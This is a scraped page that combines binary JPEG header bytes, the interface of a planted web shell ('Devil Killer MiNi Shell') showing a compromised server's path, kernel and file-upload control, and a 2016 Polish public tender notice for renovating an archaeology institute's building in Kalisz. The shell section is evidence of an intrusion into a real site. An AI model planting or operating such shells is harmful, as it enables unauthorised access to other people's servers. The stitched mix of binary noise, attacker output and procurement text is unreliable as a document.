JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20160624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20160624/103125-N-2016.html

<p class="kh_header"><b>Warszawa: Wykonanie robót budowlanych na obiekcie w Kaliszu przy ul.Młynarskiej 33</b><br>
<b>Numer ogłoszenia: 103125 - 2016; data zamieszczenia: 24.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Archeologii i Etnologii Polskiej Akademii Nauk w Warszawie , Al. Solidarności 105, 00-140 Warszawa, woj. mazowieckie, tel. 22 6202881 - 87, faks 22 624 0100.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Naukowa PAN.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych na obiekcie w Kaliszu przy ul.Młynarskiej 33.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót remontowo-budowlanych w budynku Zamawiającego w Kaliszu przy ul. Młynarskiej 33.
W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany wykonać następujące roboty i czynności:
Najważniejsze roboty główne:
1 Ocieplenie dachu budynku płytami styropianowymi jednostronnie laminowanymi gr 15 cm z pokryciem papą termozgrzewalną na włókninie poliestrowej w dwóch warstwach z wymianą obróbek blacharskich rynien i rur spustowych przy zastosowaniu blach powlekanych w kolorze brązowym oraz wymianą wyłazu dachowego,
2 Przemurowanie kominów ponad dachem z wykonaniem czapek kominowych przykrytych blacha powlekaną,
3 Wykucie drzwi garażowych do piwnicy, zamurowanie otworu z osadzeniem okna z PCV 150 x 60 cm ( uchylne dwuskrzydłowe ),
4 Wykonanie izolacji przeciwwilgociowej pionowej ścian piwnic z ich dociepleniem płytami styropianowymi XPS gr 12 cm i zastosowaniem folii kubełkowej.
5 Ocieplenie ścian parteru i piętra płytami styropianowymi gr 14 cm z tynkiem silikatowym w kolorze uzgodnionym z Zamawiającym.
6 Wymiana drzwi wewnętrznych na drewniane z ościeżnicami drewnianymi ( skrzydła z wypełnieniem płytą wiórową z otworami ).
7 Wymiana wrót do magazynu zewnętrznego na bramę segmentową z napędem ręcznym.
8 Wymiana tynków wewnętrznych piwnic i magazynu zewnętrznego z malowaniem farbami emulsyjnymi.
9 Wykonanie w magazynie zewnętrznym sufitu na ruszcie metalowym z płyt G-K i pomalowaniem farbami emulsyjnymi.
10 Wykonanie nowych posadzek w piwnicy z płytek gresowych z wymianą warstw podposadzkowych,  z izolacją termiczną wykonaną z płyt styropianowych EPS 100 gr 8 cm jak również posadzki na tarasie z wykonaniem izolacji przeciwwodnej z zaprawy szlamowej.
11 Zasypanie zjazdu do garażu piwnicznego i wymiana chodników z płytek chodnikowych na kostkę betonową szarą gr 6 cm i wykonanie miejsca parkingowego wewnętrznego z kostki betonowej szarej gr 8 cm.
12 Wykonanie opaski szerokości 50 cm wokół budynku ze żwiru frakcjonowanego 
( 16-32 mm ).
13 Wymiana bramy stalowej na posesję z furtka ( stal ocynkowana i malowana proszkowo ), z naprawa tynków bramowych,
14 Wykonanie zadaszenie nad wejściem do budynku z poliwęglanu 200 x  120 cm na profilach aluminiowych.
15 Demontaż i ponowny montaż krat stalowych na oknach.
16 Malowanie dwukrotnie krat i balustrad farbami olejnymi.
17 Wymiana grzejników żeberkowych na dwupłytowe stalowe z zaworami termostatycznymi.
18 Wymiana opraw oświetleniowych w piwnicy na świetlówkowe 2 x 40 W, na parterze i piętrze na żarowe zawieszane oraz zewnętrzne żarowe.
19 Dostawa, ustawienie na terenie Zamawiającego i wydzierżawienie 4szt.szczelnych kontenerów magazynowych typu 20 DV posiadających zamki o wymiarach 6,0 x 2,5 x 2,6 m na okres ok. trzech miesięcy ( na okres prac budowlanych w magazynach w piwnicy i garażu zewnętrznym).
20 Dostawa i montaż regałów stalowych o nośności do 100 kg na półkę na zabytki archeologiczne.
21 Wykonanie związanych z ww. robotami głównymi wszystkich robót i czynności towarzyszących, zabezpieczających, odbiory, sprawdzenia, itp.
Roboty powyższe należy wykonać zgodnie ze Specyfikacją Techniczną Wykonania  i Odbioru Robót.
Najważniejsze roboty i czynności uzupełniające:
1 Uzyskanie pisemnej zgody Zamawiającego i projektanta w przypadku stosowania materiałów i urządzeń równoważnych w stosunku do przewidzianych w SIWZ, dokumentacji projektowej lub ofercie Wykonawcy.
2 Wykonanie i uzgodnienie z Zamawiającego harmonogramu robót i planu zagospodarowania terenu zewnętrznego robót.
3 Wykonanie planu BIOZ z uwzględnienie wymagań zawartych w specyfikacji zamówienia.
4 Przenoszenie (wynoszenie i wnoszenie) mebli  i pozostałego wyposażenia pomieszczeń (urządzenia, spakowane w pudła książki, dokumenty, zabytki archeologiczne, itp.) z pomieszczeń w których będą prowadzone  roboty na korytarz lub do innych, w uzgodnieniu z użytkownikiem pomieszczeń i przedstawicielem Zamawiającego.
5 Wynoszenie z budynku, wywóz - utylizacja starego wyposażenia i urządzeń Zamawiającego - 3 kontenery o pojemności 7 m3, 
6 Likwidacja starego nie wykorzystywanego orurowania w piwnicy budynku (stara instancja c.o., wod-kan, gazowa), wymiana izolacji cieplnej poziomów instalacji c,o, w piwnicy, wymiana zlewozmywaka w piwnicy,
7 Wykonanie i stosowanie przegród i kurtyn antykurzowych, odcinających  części budynku gdzie prowadzone są roboty przez Wykonawcę, od części użytkowanej przez Zamawiającego,
8 Szczelne zabezpieczenie przed zakurzeniem i zapyleniem ( folią ochronną z PCV - pełne owinięcie i zaklejenie taśmą) znajdującego się w pomieszczeniach: sprzętu, aparatury i urządzeń, regałów, szaf, biurek, itp 
9 Dokładne zabezpieczenie przed zabrudzeniem, zakurzeniem, zadeptaniem, itp. - grubą folią budowlaną: podłóg w pokojach, korytarzach, łazienkach i wc.
10 Wykonanie we wszystkich pomieszczeniach niezbędnych prac naprawczych po prowadzonych robotach. 
11 Utrzymywanie na bieżąco pomieszczeń i terenu gdzie prowadzone są prace w należytym porządku: usuwanie na bieżąco zdemontowanych, podlegających wymianie starych elementów i wyposażenia budynku (nie zagospodarowanych przez Zamawiającego), odpadów, gruzu, śmieci, itp. i składowanie ich w pojemniku Wykonawcy na podwórzu nieruchomości w miejscu uzgodnionym z Zamawiającym, a następnie ich systematyczny wywóz i utylizacja na koszt Wykonawcy.
12 Po zakończeniu robót dokładne posprzątanie, zmywanie i odkurzenie pomieszczeń budynku i garażu zewnętrznego (posadzki, wykładziny, meble i wyposażenie, okna, parapety) oraz posprzątanie i rekultywacja terenu i zieleni, gdzie były prowadzone prace..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.50-7, 45.26.25.00-6, 45.41.00.00-4, 45.32.00.00-6, 45.43.00.00-0, 45.26.00.00-7, 45.45.00.00-6, 45.40.00.00-1, 45.42.10.00-4, 45.44.21.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 7 000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy  winni  wykazać,  że   wykonali,   zgodnie  z   zasadami  sztuki  budowlanej  i prawidłowo ukończyli, w okresie ostatnich 5 lat przed  upływem terminu składania ofert, a jeżeli  okres   prowadzenia  działalności  jest  krótszy  w  tym  okresie co   najmniej  4należycie wykonane roboty  budowlane, każda o wartości  nie mniejszej  niż 200 000 zł brutto, obejmujące swoim zakresem remont dachu, wykonanie ocieplenia i elewacji budynku, wymianę stolarki drzwiowej, przy czym łączny zakres wykazanych 4 robót budowlanych musi obejmować co najmniej po dwie realizacje każdego z głównych rodzajów robót niniejszego zamówienia tj.: 
	- co najmniej 2 realizacje  remontu dachu, 
	- co najmniej 2 realizacje ocieplenia ścian i wykonania elewacji,
	- co najmniej 2 realizacje wymiany stolarki drzwiowej.
Jedna robota budowlana oznacza  robotę wykonywaną w ramach jednej umowy.
Zamawiający   zastrzega,  że  ww. wymagane w ramach doświadczenia wykonawcy 4 roboty budowlane nalezą do najważniejszych robót  budowlanych,  jakie   powinien wykazać Wykonawca w wymaganym wykazie zrealizowanych robót budowlanych wraz z załączeniem dokumentów potwierdzających ich należyte wykonanie (załączniki do oferty).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  warunek  za  spełniony, jeżeli  Wykonawca wykaże (wraz z podaniem informacji o podstawie dysponowania),  że  dysponuje  lub będzie dysponował do realizacji przedmiotu zamówienia następującymi osobami posiadającymi uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo Budowlane (Dz. U. z 2013  r., poz. 1409) i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006  r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z dnia 16 maja 2006  r. nr 83 poz. 578) lub odpowiadające im ważne uprawnienia  budowlane  wydane  na  podstawie  wcześniej  obowiązujących  przepisów  lub których  odpowiednie kwalifikacje  zawodowe zostały uznane   na  zasadach   określonych w przepisach odrębnych:

a) kierownikiem budowy pełniącym jednocześnie funkcję kierownika robót - posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej oraz co najmniej 6 letnie doświadczenie w pełnieniu funkcji kierownika budowy i kierownika robót.
b) co najmniej 3osobami posiadającymi minimum 4 letnie doświadczenie w  zakresie  realizacji robót objętych zamówieniem.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  warunek  za  spełniony, jeżeli  Wykonawca wykaże że znajdują się w sytuacji ekonomicznej i finansowej umożliwiającej wykonanie przedmiotu zamówienia tj: 

a) posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 200 000 zł,
b) posiada ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 200 000 zł w całym okresie realizacji zamówienia, tj. od daty podpisania umowy do przewidywanego terminu odbioru końcowego przedmiotu umowy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykaz materiałów przewidzianych do realizacji zamówienia wraz z dokumentami potwierdzającymi ich parametry techniczne i jakościowe ( formularz oferty) oraz szczegółowa kalkulację ceny ofertowej - kosztorys zawierających nazwy handlowe oferowanych materiałów do realizacji zamówienia.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiąjący wymaga założenia wykazu wszystkich robót budowlanych, wykonanych przez Wykonawcę w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania wraz z informacjami, które z tych robót zostały zrealizowane z przyczyn zależnych od Wykonawcy: - z późnieniem - po terminie (należy podać ile wynosiło opóźnienie), - ze zmniejszonym wynagrodzeniem (należy podać o ile procent wynagrodzenie zostało zmniejszone,(załącznik nr 5A do SIWZ);</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Okres gwarancji i rękojmi - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczności wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową, tylko w sytuacji gdy wykonanie tych robót będzie niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy Przewiduje się także możliwość zmiany - ograniczenia zakresu rzeczowego przedmiotu umowy tylko w sytuacji, gdy wykonanie danych robót będzie zbędne do
prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy Zamawiający tylko w uzasadnionych przypadkach, na pisemny wniosek Wykonawcy może dopuścić wprowadzenie zamiany materiałów, technologii lub urządzeń przedstawionych w ofercie
przetargowej i określonych w SIWZ lub dokumentacji projektowej pod warunkiem, że zmiany te będą korzystne dla zamawiającego. 
Terminy realizacji zamówienia za zgodą Zamawiającego mogą ulec zmianie w przypadku wystąpienia: a) uzasadnionych przestojów i opóźnień zawinionych przez
zamawiającego, b) działania siły wyższej (na przykład klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonywania robót, c) okoliczności których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności. W przypadku ograniczenia zakresu rzeczowego
przedmiotu umowy i odstąpienia przez Zamawiającego od części robót, obliczenie  wartości niewykonanej części robót nastąpi na podstawie ustalenia, przez zamawiającego i wykonawcę, procentowego stosunku niewykonanych robót do całości lub danego etapu robót. Na tej podstawie zostanie wyliczona wartość niewykonanych robót i odliczona od ogólnej wartości przedmiotu umowy. a) powodujące obniżenie kosztu ponoszonego przez zamawiającego na eksploatację i konserwację wykonanego przedmiotu umowy, b) powodujące poprawienie parametrów technicznych, jakościowych i właściwości użytkowych, c) wynikające z aktualizacji rozwiązań z uwagi
na postęp technologiczny lub zmiany obowiązujących przepisów. Z ważnych względów organizacyjnych leżących po stronie Wykonawcy dopuszcza się rezygnację ze zgłoszonych Podwykonawców oraz zmianę zgłoszonych przez Wykonawcę Podwykonawców w trakcie realizacji umowy, wymienionych w § 2a umowy. 2. Zgodnie z art.144 ust.1 ustawy PZP przewiduje się zmianę sposobu wykonania przedmiotu umowy, gdy: a) Wykonawca dokona zmiany zgłoszonego w ofercie zakresu rzeczowego wykonywanego przy udziale Podwykonawcy, z zachowaniem terminu wykonania przedmiotu umowy, b) Wykonawca dokona zmiany Podwykonawcy lub zrezygnuje z Podwykonawcy, przy czym, w przypadku gdy Wykonawca w celu wykazania spełnienia warunków udziału w postępowaniu, powoływał się na zasoby tego Podwykonawcy na zasadach określonych w art.26 ust.2b ustawy PZP, Wykonawca jest zobowiązany wykazać Zamawiającemu, iż proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia, z zachowaniem terminu wykonania przedmiotu 